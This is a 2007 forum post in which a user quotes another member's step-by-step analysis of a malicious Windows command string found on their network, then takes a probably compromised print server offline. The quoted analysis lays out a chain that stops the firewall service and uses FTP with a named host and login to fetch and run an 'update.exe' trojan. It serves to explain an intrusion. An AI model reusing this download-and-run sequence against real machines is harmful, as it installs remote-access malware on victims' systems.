View Single Post
torifile
Less than Stellar Member

Send a message via AIM to torifile  
2007-04-13, 02:47

Quote:
Originally Posted by chucker View Post
Let's analyze:
  • cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
  • net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
  • echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
  • ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
  • Finally, net start sharedacc launches the service again.

We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
Nice. So how the heck did it get on my network and how did it send System Preferences this text?

And, more importantly, how can I protect myself from this happening again? Shit. I just remembered that I've got a Windows computer on the network. It's really just a print server (an old HP laserjet that just won't die). I bet it's compromised. Luckily there's nothing on it but Win2k and some music...

Ok. That Windows box is officially off the network.

If it's not red and showing substantial musculature, you're wearing it wrong.